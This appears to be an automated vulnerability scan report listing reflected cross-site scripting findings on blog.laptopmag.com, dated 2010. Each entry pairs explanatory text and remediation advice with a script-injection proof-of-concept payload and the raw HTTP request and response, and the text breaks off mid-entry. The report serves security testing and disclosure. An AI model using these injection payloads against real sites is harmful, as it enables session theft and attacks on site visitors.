Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://blog.laptopmag.com/ [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.laptopmag.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e56ce</script><script>alert(1)</script>8be5e474b21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?e56ce</script><script>alert(1)</script>8be5e474b21=1 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:12:56 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/NAxW>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 93384
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8380f</script><script>alert(1)</script>10100422f8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /10-reasons-why-consumers-should-buy-business-notebooks8380f</script><script>alert(1)</script>10100422f8d HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 12 Nov 2010 00:13:05 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 12 Nov 2010 00:13:05 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51597
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 967b4</script><script>alert(1)</script>a854ae02f3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /10-reasons-why-consumers-should-buy-business-notebooks?967b4</script><script>alert(1)</script>a854ae02f3d=1 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:12:53 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-6pE>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 79348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 408c2</script><script>alert(1)</script>b9fd285174 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5-questions-to-answer-before-you-buy-a-laptop408c2</script><script>alert(1)</script>b9fd285174 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 12 Nov 2010 00:13:03 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 12 Nov 2010 00:13:03 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51577
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.5. http://blog.laptopmag.com/5-questions-to-answer-before-you-buy-a-laptop [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.laptopmag.com
Path:
/5-questions-to-answer-before-you-buy-a-laptop
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f8ac</script><script>alert(1)</script>68ad2eb3fe3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5-questions-to-answer-before-you-buy-a-laptop?9f8ac</script><script>alert(1)</script>68ad2eb3fe3=1 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:12:52 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-8b3>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 70765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7fd82</script><script>alert(1)</script>96fa7b5a477 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bestdeals.aspx7fd82</script><script>alert(1)</script>96fa7b5a477 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 12 Nov 2010 00:12:08 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 12 Nov 2010 00:12:08 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51517
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.7. http://blog.laptopmag.com/bestdeals.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.laptopmag.com
Path:
/bestdeals.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ad1c</script><script>alert(1)</script>56d9462c35b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bestdeals.aspx?9ad1c</script><script>alert(1)</script>56d9462c35b=1 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 12 Nov 2010 00:11:53 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 12 Nov 2010 00:11:54 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77206</script><script>alert(1)</script>9e53fe46618 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal-of-the-day-get-a-hp-pavilion-dm4-fo-62977206</script><script>alert(1)</script>9e53fe46618 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 12 Nov 2010 00:13:02 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 12 Nov 2010 00:13:03 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51577
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.9. http://blog.laptopmag.com/deal-of-the-day-get-a-hp-pavilion-dm4-fo-629 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.laptopmag.com
Path:
/deal-of-the-day-get-a-hp-pavilion-dm4-fo-629
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 733dc</script><script>alert(1)</script>bb27085b151 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal-of-the-day-get-a-hp-pavilion-dm4-fo-629?733dc</script><script>alert(1)</script>bb27085b151=1 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:12:51 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fUt>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65387
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d793</script><script>alert(1)</script>354da8b13ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal-of-the-day-lenovo-g460-for-5793d793</script><script>alert(1)</script>354da8b13ee HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 12 Nov 2010 00:12:52 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 12 Nov 2010 00:12:52 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51559
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.11. http://blog.laptopmag.com/deal-of-the-day-lenovo-g460-for-579 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.laptopmag.com
Path:
/deal-of-the-day-lenovo-g460-for-579
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71a7a</script><script>alert(1)</script>3147df2e7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal-of-the-day-lenovo-g460-for-579?71a7a</script><script>alert(1)</script>3147df2e7b=1 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:12:41 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fWV>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 65568
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 220fc</script><script>alert(1)</script>ab11e339131 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /help-me-laptop-international-business-traveller-seeking-a-productivity-notebook220fc</script><script>alert(1)</script>ab11e339131 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 12 Nov 2010 00:12:44 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 12 Nov 2010 00:12:44 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.13. http://blog.laptopmag.com/help-me-laptop-international-business-traveller-seeking-a-productivity-notebook [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74a06</script><script>alert(1)</script>7e2efcda0be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /help-me-laptop-international-business-traveller-seeking-a-productivity-notebook?74a06</script><script>alert(1)</script>7e2efcda0be=1 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:12:27 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fP3>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 71504
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9688</script><script>alert(1)</script>dab05a7d00a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-to-buy-headphones-as-a-giftb9688</script><script>alert(1)</script>dab05a7d00a HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 12 Nov 2010 00:12:59 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 12 Nov 2010 00:12:59 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51551
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.15. http://blog.laptopmag.com/how-to-buy-headphones-as-a-gift [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.laptopmag.com
Path:
/how-to-buy-headphones-as-a-gift
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c6f5</script><script>alert(1)</script>29ec08d9b6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how-to-buy-headphones-as-a-gift?5c6f5</script><script>alert(1)</script>29ec08d9b6d=1 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:12:47 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fUv>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 66558
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c942</script><script>alert(1)</script>78e5b0ab05f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /is-this-the-nexus-s2c942</script><script>alert(1)</script>78e5b0ab05f HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 12 Nov 2010 00:12:44 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 12 Nov 2010 00:12:44 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51527
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.17. http://blog.laptopmag.com/is-this-the-nexus-s [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.laptopmag.com
Path:
/is-this-the-nexus-s
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2f01</script><script>alert(1)</script>0692e8c28dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /is-this-the-nexus-s?c2f01</script><script>alert(1)</script>0692e8c28dc=1 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:12:30 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fXn>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 64701
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30db0</script><script>alert(1)</script>9bec4d374a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /macbook-air-hands-on30db0</script><script>alert(1)</script>9bec4d374a8 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 12 Nov 2010 00:12:40 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 12 Nov 2010 00:12:40 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51529
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.19. http://blog.laptopmag.com/macbook-air-hands-on [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://blog.laptopmag.com
Path:
/macbook-air-hands-on
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 812f7</script><script>alert(1)</script>62bfd75ccc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /macbook-air-hands-on?812f7</script><script>alert(1)</script>62bfd75ccc4=1 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 12 Nov 2010 00:12:22 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Link: <http://wp.me/pNAxW-fnc>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 77555
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0e47</script><script>alert(1)</script>2590b442583 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sony-whittles-their-vaio-y-series-to-11-6-inchesc0e47</script><script>alert(1)</script>2590b442583 HTTP/1.1 Host: blog.laptopmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 12 Nov 2010 00:13:03 GMT Server: Apache X-Powered-By: PHP/5.2.8 X-Pingback: http://blog.laptopmag.com/wpress/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 12 Nov 2010 00:13:03 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51585
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.21. http://blog.laptopmag.com/sony-whittles-their-vaio-y-series-to-11-6-inches [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
